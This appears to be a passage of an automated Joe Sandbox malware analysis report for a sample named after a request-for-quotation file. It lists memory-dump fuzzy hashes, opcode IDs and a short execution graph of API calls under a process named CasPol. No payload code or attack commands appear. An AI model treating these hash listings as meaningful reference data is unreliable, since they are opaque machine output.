                                                                                            • Opcode Fuzzy Hash: 8a1110624b7794e8b508c8b9d13d963f524956fd129a1ecab397396b26a3c334
                                                                                            • Instruction Fuzzy Hash: 3F41133050CA954FE74AAB2888255797BE0FF87345B0805FED4CACB2E3EA2CD645C741
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4b432f4b196fd1b7ecdfeb0005e20ff7f31cb69b329d370235fcb1f9bcc38c19
                                                                                            • Instruction ID: 8a0f543806ac679d2eed815b4bf8172d547c75066fa99fa1c27a1c6a56369383
                                                                                            • Opcode Fuzzy Hash: 4b432f4b196fd1b7ecdfeb0005e20ff7f31cb69b329d370235fcb1f9bcc38c19
                                                                                            • Instruction Fuzzy Hash: 17414831A0D68A4FE79AB76898A53B93BE0EF46750F0400BBD089C71D3EF2C58858756
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a5d29f2318cd4f8343cf47a51401478e0e7940f328898e34c3ee89781c725425
                                                                                            • Instruction ID: 4d3689f446bcaa300863bcc0305851379619e09551547d3e8df089ff4a9b563d
                                                                                            • Opcode Fuzzy Hash: a5d29f2318cd4f8343cf47a51401478e0e7940f328898e34c3ee89781c725425
                                                                                            • Instruction Fuzzy Hash: 17416F30A09A1E8FDB94EF2CD4546B97BF0FF5A341F1505AAD409D72A1DB35AD40CB80
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 171eedcd4bdee0aee1e92a8794de6607f824639efeda9d7be20853ea5f10006f
                                                                                            • Instruction ID: d3f97fe3128847a701b7c6e69810f2c972c01ce8c7a81d863bc4b1a0a5439076
                                                                                            • Opcode Fuzzy Hash: 171eedcd4bdee0aee1e92a8794de6607f824639efeda9d7be20853ea5f10006f
                                                                                            • Instruction Fuzzy Hash: 5441D53164D7C64FD30BA73888641A5BFA2EB83360F1942EBC085CB1E7DA2C5D49C756
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Opcode Fuzzy Hash: 91cbe01ae2dcad4b4b14303100d288e744de6dcc1e088a2c13e7b9a002fab874
                                                                                            • Instruction Fuzzy Hash: 3C01FC53D0F9C15EF7A5732C28961BC2EC0EF53198F1904BAD988861D7EE0C18429387
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 86ac7d22e72876932c9cefbebae8fae265fed3344e07282e09b7d8d225e33e6e
                                                                                            • Instruction ID: f26bc2e17ddfa4b06a8d44f31c83b44029d7f286d4e03936f6ba49517e05dec9
                                                                                            • Opcode Fuzzy Hash: 86ac7d22e72876932c9cefbebae8fae265fed3344e07282e09b7d8d225e33e6e
                                                                                            • Instruction Fuzzy Hash: 4401923071C6458FCB0CAB18C55557A73E7E7D6311F60863DD487CA3D5CA38A806C784
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d425e6ce4b73072eb8979aeeaec758f899c0379a1e3855b12570cdbed6849b2d
                                                                                            • Instruction ID: 6a1c9d0198b46a5937f88d90674fb33abf617b7df73f2c85362f73dcc9c6b066
                                                                                            • Opcode Fuzzy Hash: d425e6ce4b73072eb8979aeeaec758f899c0379a1e3855b12570cdbed6849b2d
                                                                                            • Instruction Fuzzy Hash: 3FF0F63151DE894FC776E73C98505627BF1EFA931070906ABD09AC36A6DE29EC46C380
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b3a76191013b68861c557e5c6765a5fcebdbea4f091085f43fb63448c19765fb
                                                                                            • Instruction ID: 13e9085b0c6f6c5e8dd0532bf235503ff751c9b46a7f51a91bc1aa8ae8d81964
                                                                                            • Opcode Fuzzy Hash: b3a76191013b68861c557e5c6765a5fcebdbea4f091085f43fb63448c19765fb
                                                                                            • Instruction Fuzzy Hash: 05F05E72B5DE090FA28CBA4C78562B873C0E799761F40017FE44EC3297ED5A6C434289
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 367fcb5fb85efc002ba39b0d921e7a4895aa6d041cc58e348952d90460137940
                                                                                            • Instruction ID: d8ccd6811ea7afc5d3dcfb7d3f5866876d62a6d220f9a0968b594a8667221703
                                                                                            • Opcode Fuzzy Hash: 367fcb5fb85efc002ba39b0d921e7a4895aa6d041cc58e348952d90460137940
                                                                                            • Instruction Fuzzy Hash: 71018639A1C64E8FEB50EF44D8406EA77A1FF85344F400136E40C9A1C5EB39AAA5CB80
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b5518f6998d98c5da8a555ff062fa5dcfa7c92289a04beb19695ce0ed71d7f12
                                                                                            • Instruction ID: 612be0b1bd0d4472924ce9f94564f8f22ffb132f053b4a28363eff3de9baa61e
                                                                                            • Opcode Fuzzy Hash: b5518f6998d98c5da8a555ff062fa5dcfa7c92289a04beb19695ce0ed71d7f12
                                                                                            • Instruction Fuzzy Hash: 66F0E931A1DB884FC749B73C58191983BE0EF5B251B4901F7E008CB2E3EA28DC408356
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 06cb759eaf8b604ac5b25c027bad010d286b085d6ea63523500f7e57b09f705c
                                                                                            • Instruction ID: 92d5c0c13253475eafebaddf8d82260d43b495fe9e2c06253322d7303d13f5de
                                                                                            • Opcode Fuzzy Hash: 06cb759eaf8b604ac5b25c027bad010d286b085d6ea63523500f7e57b09f705c
                                                                                            • Instruction Fuzzy Hash: B3F08235618D0D4FC6B4EA2C944496273E1EB98310715066AD45AC3668DF24E8418780
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ffdadd5829b555f222ecc106774fa7d29a365505da76cbc7c9be3b4dd90dae07
                                                                                            • Instruction ID: 70460ff0d8d0199f2dc9f01cd3683af742d43cfedf98b3d9bd923d717c060cd0
                                                                                            • Opcode Fuzzy Hash: ffdadd5829b555f222ecc106774fa7d29a365505da76cbc7c9be3b4dd90dae07
                                                                                            • Instruction Fuzzy Hash: 1DF02431F0C50A4FD728EE6C98908B67393D790390F04423EC007C72C5DE28B9458244
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c8940f38400b9d4657889e4f164820048c729980c875fe724e594bc6dcfa33bb
                                                                                            • Instruction ID: daaed9bf8b3063ea232247ee96218a8f0d4f41f9dac249329da7214af062fcf5
                                                                                            • Opcode Fuzzy Hash: c8940f38400b9d4657889e4f164820048c729980c875fe724e594bc6dcfa33bb
                                                                                            • Instruction Fuzzy Hash: E6F0273070C50A4FC60CE95889964797247E7D9740B10C37ED44B862EAEE746C1786C5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f72c553f9f002a201d115994aeb7561a3a8d1e592e63e1020d390b234667ba8e
                                                                                            • Instruction ID: f98c3d65dbe3e7629124bb2a2efcf14cb081de5c8711fbd1e438ce2d7009c2f4
                                                                                            • Opcode Fuzzy Hash: f72c553f9f002a201d115994aeb7561a3a8d1e592e63e1020d390b234667ba8e
                                                                                            • Instruction Fuzzy Hash: 60E0D832F0DC0A4FE398E6AE7CD81B053C1E799261B580176D00DC72C5FD085C864358
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 65eeb7cc31a9f3c6edcf8d1e9cfce4adaf4f60fa6d0f8a5167bcc4edc6202721
                                                                                            • Instruction ID: f5bcc8bab1060b6b6c10a9f9a68d918ac14c6ec2f14bd397c8b98107ab414a90
                                                                                            • Opcode Fuzzy Hash: 65eeb7cc31a9f3c6edcf8d1e9cfce4adaf4f60fa6d0f8a5167bcc4edc6202721
                                                                                            • Instruction Fuzzy Hash: 25E0D132B1DD550FF354673CA8551B4B6D0FB8A219B2445FFD489C31E6ED1A9983C344
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4b02c4a82e987a1fc9cccfd12ada405fef7ed4666e617cc7ce8654a8a9dd6208
                                                                                            • Instruction ID: 41f4ac9a92780f6003155a2e6cccf01c9f5efd90de6dbd6dffc1addebc891920
                                                                                            • Opcode Fuzzy Hash: 4b02c4a82e987a1fc9cccfd12ada405fef7ed4666e617cc7ce8654a8a9dd6208
                                                                                            • Instruction Fuzzy Hash: 12E04F30B1990C4FCB98B73CA8095A832D1DF9A351B4415B5F40DC7296ED28DC814385
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 176574feb851112b73e6d8bbb1347b6892d9b38d6409b8d4916e8785aee5e8a9
                                                                                            • Instruction ID: c3a4cc3941afbcb511224fbab55976088612cd3cec36605c764d58adc9166c8c
                                                                                            • Opcode Fuzzy Hash: 176574feb851112b73e6d8bbb1347b6892d9b38d6409b8d4916e8785aee5e8a9
                                                                                            • Instruction Fuzzy Hash: C9E02B71B1C2065FD708FB1CC5410F973D6D799319F10853AD48AD62D5D92CE8424246
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d54bdcc2e0dd7bdf5072320c9e209df687cf00a498092bb664c99ed7d92dd773
                                                                                            • Instruction ID: e7abab3d4c0cd853929658e9b931cbb5008f1dbfb19c9651d5ecbfecaf685942
                                                                                            • Opcode Fuzzy Hash: d54bdcc2e0dd7bdf5072320c9e209df687cf00a498092bb664c99ed7d92dd773
                                                                                            • Instruction Fuzzy Hash: 75F0E5347086034FD31CEB18C1904AAB393FBD9351B20863AC1428B3E8DD78A846C688
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 62ad0618e0f2f397e804f7210cf2fad93d8ad93396e57afab9df9001f9ee05f0
                                                                                            • Instruction ID: e7db192508fa9f52bd34f188319b30771dfdad90379817c151df4c07aeb9ca18
                                                                                            • Opcode Fuzzy Hash: 62ad0618e0f2f397e804f7210cf2fad93d8ad93396e57afab9df9001f9ee05f0
                                                                                            • Instruction Fuzzy Hash: 6EE09B65D0D9950FD3A5B32C04651787A90EF86654F5500EFC549CB1D3EA045C094389
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 33552d1e25960ce2add880c936a9c003dcc41d64dd981cfb61c59dee615e75dc
                                                                                            • Instruction ID: 6f315d0a9612d1781e0ec5e3409939778b4b477830f3d051e0e7da43d69ea67a
                                                                                            • Opcode Fuzzy Hash: 33552d1e25960ce2add880c936a9c003dcc41d64dd981cfb61c59dee615e75dc
                                                                                            • Instruction Fuzzy Hash: EFE01A3194E7C90FD713677468205967F74AF43104F0A40E7E4A8CB0E3EA586A68C366
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 780eae8080742d4bab3725343003a01ed318a01eb725264d2e27c80bc31fcb94
                                                                                            • Instruction ID: 6013e392c3a2185b325de1e937ca835fcde383c5c7d3d6400eb49acc1b76684c
                                                                                            • Opcode Fuzzy Hash: 780eae8080742d4bab3725343003a01ed318a01eb725264d2e27c80bc31fcb94
                                                                                            • Instruction Fuzzy Hash: F8D0C23080E6459FC344AB208451514B7A0FF86240F9045A9E4048B284D23D54949741
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3cd3f5909fb219681108f672e8eb12f7e48beb80aa57092f8af953e40960ae55
                                                                                            • Instruction ID: 345154f71c5090ac9793a6fa4891a25e8dbbcaba646dae64bf06e1ede51524a4
                                                                                            • Opcode Fuzzy Hash: 3cd3f5909fb219681108f672e8eb12f7e48beb80aa57092f8af953e40960ae55
                                                                                            • Instruction Fuzzy Hash: 53E08C3102C7828FC348FB18C08257ABBA0BB4A354F20186EE1CBCA0A2CA28F410C646
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 92689a7519af97a9a2111b6acd8aa02426bf67ca79491fd2bb6dcfc78fcdba5b
                                                                                            • Instruction ID: b084f774829d17dd85ed299202a025b5bd6bb1ebda778e539a8f6ef708193c2f
                                                                                            • Opcode Fuzzy Hash: 92689a7519af97a9a2111b6acd8aa02426bf67ca79491fd2bb6dcfc78fcdba5b
                                                                                            • Instruction Fuzzy Hash: 50D0A93206DA008FE20CEB2488811A7B296BB5A240F20A43EE0C7C2182EE20F4018705
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2327839338.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff848f00000_RFQ_TFS-1508-AL NASR ENGINEERING.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: H
                                                                                            • API String ID: 0-2852464175
                                                                                            • Opcode ID: dd2c7c2c20382f1c9c6171ce413e1220c0af11f2f6505dcebcdbb3ce2d61931d
                                                                                            • Instruction ID: 7c30c2db3816bfed3cfa5a3311649a731ff2ca68c3b0d95ebdba11f12074232b
                                                                                            • Opcode Fuzzy Hash: dd2c7c2c20382f1c9c6171ce413e1220c0af11f2f6505dcebcdbb3ce2d61931d
                                                                                            • Instruction Fuzzy Hash: E922786699E7D64FE31367705C380A07FB1AE23991B1E41EBC1D4CB5E3E64E180AC726

                                                                                            Execution Graph

                                                                                            Execution Coverage:16.1%
                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                            Signature Coverage:0%
                                                                                            Total number of Nodes:27
                                                                                            Total number of Limit Nodes:0
                                                                                            execution_graph 11877 6e0848 11878 6e0856 11877->11878 11881 6e1251 11878->11881 11882 6e128b 11881->11882 11883 6e13c2 11882->11883 11889 6e1862 11882->11889 11893 6e1870 11882->11893 11884 6e1432 11883->11884 11887 6e1862 KiUserExceptionDispatcher 11883->11887 11888 6e1870 KiUserExceptionDispatcher 11883->11888 11887->11884 11888->11884 11890 6e1893 11889->11890 11891 6e18ba KiUserExceptionDispatcher 11890->11891 11892 6e1897 11890->11892 11891->11892 11892->11882 11894 6e1893 11893->11894 11895 6e18ba KiUserExceptionDispatcher 11894->11895 11896 6e1897 11894->11896 11895->11896 11896->11882 11897 6e0871 11900 6e08d8 11897->11900 11898 6e0889 11901 6e08fa 11900->11901 11905 6e0ce0 11901->11905 11909 6e0ce8 11901->11909 11902 6e093e 11902->11898 11906 6e0d26 GetConsoleWindow 11905->11906 11908 6e0d56 11906->11908 11908->11902 11910 6e0d26 GetConsoleWindow 11909->11910 11912 6e0d56 11910->11912 11912->11902

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1719 6e0ce0-6e0d54 GetConsoleWindow 1722 6e0d5d-6e0d82 1719->1722 1723 6e0d56-6e0d5c 1719->1723 1723->1722
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2220001097.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_6e0000_CasPol.jbxd
                                                                                            Similarity
                                                                                            • API ID: ConsoleWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2863861424-0
                                                                                            • Opcode ID: 43b97710f2aa0ae5cc899de059f473e471d2e4854cbb2837f2548aa86ca6043e
                                                                                            • Instruction ID: 28b1dae695e1c86353960502524a17a9366c28d709ec16f1525a9478f8fe0271
                                                                                            • Opcode Fuzzy Hash: 43b97710f2aa0ae5cc899de059f473e471d2e4854cbb2837f2548aa86ca6043e
                                                                                            • Instruction Fuzzy Hash: 471146759042498FDB20DFAAD8457EEFFF1EF48314F20885AC419A7240C779A585CBA0
                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 006E18BE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2220001097.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_6e0000_CasPol.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: a89cda0a5bcf3486da076e03013860ec393e5cc8b038bc3af31139c8d03943cd
                                                                                            • Instruction ID: a3275d80f76c3eb9f620a51a3e4ac7d34be2d077bc3982bbe6dd244eab7a24f0
                                                                                            • Opcode Fuzzy Hash: a89cda0a5bcf3486da076e03013860ec393e5cc8b038bc3af31139c8d03943cd
                                                                                            • Instruction Fuzzy Hash: 58011E71F002158FCB44EFB9D81459EB7F6EF8961471148A5E509EB360EB349D028B91

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1727 6e0ce8-6e0d54 GetConsoleWindow 1730 6e0d5d-6e0d82 1727->1730 1731 6e0d56-6e0d5c 1727->1731 1731->1730
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2220001097.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_6e0000_CasPol.jbxd
                                                                                            Similarity
                                                                                            • API ID: ConsoleWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2863861424-0
                                                                                            • Opcode ID: c0330beb6a998ed9b16cfff69c7623229c75735da5cbfba11ba120771c775be4
                                                                                            • Instruction ID: 1a8a30188b6d7ce1b973eeb61b8e4acfca4d7225420cb41257083a118afa3de1
                                                                                            • Opcode Fuzzy Hash: c0330beb6a998ed9b16cfff69c7623229c75735da5cbfba11ba120771c775be4
                                                                                            • Instruction Fuzzy Hash: 0311F5B59003498FDB20DFAAC4457DEFBF5EF48314F208419D519A7244CB79A544CBA5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2219634143.000000000063D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0063D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_63d000_CasPol.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cda025dbdbb256a8ddf8b89b7f883774600971e8b2eca03a790d226935324963
                                                                                            • Instruction ID: 0b4533ef6d8a4d6be30176a8bdd02d199e06ff7c519a4e95be44a696b159cfa2
                                                                                            • Opcode Fuzzy Hash: cda025dbdbb256a8ddf8b89b7f883774600971e8b2eca03a790d226935324963
                                                                                            • Instruction Fuzzy Hash: 2A21C471504240DFCB19DF14E9C0B26BF66FB88714F24C669E9090A256C33AD826DBA1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2219634143.000000000063D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0063D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_63d000_CasPol.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 34cb352f111f05d10a6acc2de0d1ac0245d18e8bba35c4bb12a039a3ddd2be18
                                                                                            • Instruction ID: c9510a3b337de9ca2a6b329605edfb14b404faa9c7c01e3cf16b6f4ac4515728
                                                                                            • Opcode Fuzzy Hash: 34cb352f111f05d10a6acc2de0d1ac0245d18e8bba35c4bb12a039a3ddd2be18
                                                                                            • Instruction Fuzzy Hash: E22145B1100244EFCB05DF14E9C0F26BF66FB99324F208569E9090B356C33AD856C7E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2219681027.000000000064D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0064D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_64d000_CasPol.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ba136d438169e11f541d93e9ecbb044599131e887fa71d0fb4ab76421e04c555
                                                                                            • Instruction ID: 6fb1cfae54ae55619b12e4861cc231322c6f78c43e88caf42783945a16e493e7
                                                                                            • Opcode Fuzzy Hash: ba136d438169e11f541d93e9ecbb044599131e887fa71d0fb4ab76421e04c555
                                                                                            • Instruction Fuzzy Hash: 9F210471A04204DFCB05DF54D9C4B26BBA6FB88314F20C56DE9094B396C33AE806CA62
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2219681027.000000000064D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0064D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_64d000_CasPol.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4cd24c2efccf27a0112dda03c0b37c40d2bafeda34511ae2afb4a1b0dd165b55
                                                                                            • Instruction ID: 4dfc56a1beacd32e107c5aa0d1f039d7ad4748a945e15c31754334688a04a333
                                                                                            • Opcode Fuzzy Hash: 4cd24c2efccf27a0112dda03c0b37c40d2bafeda34511ae2afb4a1b0dd165b55
                                                                                            • Instruction Fuzzy Hash: 3F215B71904204DFDB01DF14D5C4B27FFA6FB98324F20C669EA094B346C3BAD906C6A2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2219634143.000000000063D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0063D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
